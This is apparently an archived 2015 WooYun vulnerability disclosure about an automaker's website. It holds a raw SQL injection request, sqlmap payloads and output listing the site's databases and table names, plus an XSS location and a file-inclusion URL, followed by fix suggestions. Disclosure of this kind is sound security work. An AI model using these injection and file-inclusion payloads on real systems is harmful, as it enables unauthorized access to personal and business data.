乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-22: 细节已通知厂商并且等待厂商处理中 2015-09-23: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-03: 细节向核心白帽子及相关领域专家公开 2015-10-13: 细节向普通白帽子公开 2015-10-23: 细节向实习白帽子公开 2015-11-07: 细节向公众公开
SQL、XSS、本地文件包含等多个漏洞。
1、SQL注入2、XSS跨站3、本地文件包含广汽吉奥:
http://**.**.**.**/
1、SQL注入漏洞:1.1注入点
POST /service/manage/searchProgress.jsp HTTP/1.1Cache-Control: no-cacheReferer: http://**.**.**.**/service/service_jsp_catid_222.htmlAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 NetsparkerAccept-Language: en-us,en;q=0.5X-Scanner: NetsparkerHost: **.**.**.**Cookie: JSESSIONID=abcw8GrD2ghUA5zdraG-uAccept-Encoding: gzip, deflateContent-Length: 54Content-Type: application/x-www-form-urlencodedsearch_name=Smith&search_phone=%27+OR+%27ns%27%3d%27ns
1.2 涉及数据库
Place: POSTParameter: search_phone Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: search_name=Smith&search_phone=' OR 'ns'='ns' AND 2140=2140 AND 'emIK'='emIK Type: UNION query Title: MySQL UNION query (NULL) - 15 columns Payload: search_name=Smith&search_phone=' OR 'ns'='ns' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6f78773a,0x514146754c41434a434d,0x3a70757a3a), NULL, NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: search_name=Smith&search_phone=' OR 'ns'='ns' AND SLEEP(5) AND 'RgwA'='RgwA---[19:51:28] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.2.25back-end DBMS: MySQL 5.0.11[19:51:28] [INFO] fetching database namesavailable databases [3]:[*] gonow[*] information_schema[*] test
1.3 其中一个database
Database: gonow[74 tables]+-------------------------------+| ad || cms_archive || cms_archive_backup || cms_archive_hist || cms_archive_keyword || cms_archive_right || cms_pic_permission || cms_read_history || hrs3_base_info || hrs3_certificate || hrs3_education || hrs3_experience || hrs3_position || hrs3_position_resume || hrs3_positionanduserinfo || hrs3_resume || hrs3_training || hrs3_users || hrs3_usersinfo || hsr3_resumeanduserinfo || hsr3_resumeinfo || nds_car || nds_car_sell || nds_car_series || nds_car_type || nds_dealer || nds_dealer_back || nds_service || nds_service_back || prj_e_bookingcar || prj_e_configuration || prj_e_drive || prj_e_userinfo || prj_fitting_car || prj_fitting_list || prj_nds_applytry || prj_nds_onlinebook || prj_service_message || prj_service_questions || prj_service_questions_support || sys_InfoUser || sys_SysopIP || sys_category || sys_category_hist || sys_class || sys_class_role || sys_class_role_hist || sys_class_user || sys_class_user_hist || sys_depart || sys_depart_list || sys_detail || sys_dict || sys_dicttype || sys_file || sys_filesetting || sys_guestbook || sys_infodepart || sys_infogroup || sys_infouser || sys_infouserread || sys_operationlog || sys_role || sys_role_item || sys_sequence || sys_subcategory || sys_sysopdetail || sys_sysopip || sys_sysoplogin || sys_version || sys_zone || sysop || sysop_role || sysop_role_hist |+-------------------------------+
2、XSS,官网搜索功能模块:
http://**.**.**.**/search/search_ar.jsp
3、本地包含漏洞
http://**.**.**.**/public/download.jsp?file=%2fpublic%2fdownload.jsp
<没有继续渗透,比较花时间。>
1、SQL
2、XSS
3、文件包含
1、SQL 过滤参数2、XSS限制特殊符号3、文件包含漏洞过滤该页面参数
危害等级:中
漏洞Rank:9
确认时间:2015-09-23 16:11
CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无